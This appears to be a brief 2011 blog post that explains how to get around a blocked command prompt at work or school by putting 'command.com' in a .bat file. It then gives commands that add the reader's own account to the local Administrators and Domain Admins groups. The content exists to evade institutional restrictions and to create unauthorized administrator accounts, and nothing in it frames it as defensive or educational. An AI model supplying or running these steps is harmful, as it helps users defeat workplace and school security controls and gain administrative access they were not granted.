Saturday, March 12, 2011

How to access cmd if it is blocked!

This is a guide that can give you access to cmd.exe if it is blocked at your work or school.

1-Open notepad

2-Type "command.com" in the text file

3- Save the file as command.bat( or whatever you want, as long as it ends in .bat.)

Additional Tips

Admin Control-
net user YOURUSER YOURPASS /add >> Add_admin.txt
net localgroup Administrator YOURUSER /add >> Add_admin.txt
net group "Domain Admins" YOURUSER /add >> Add_admin.txt

0 comments: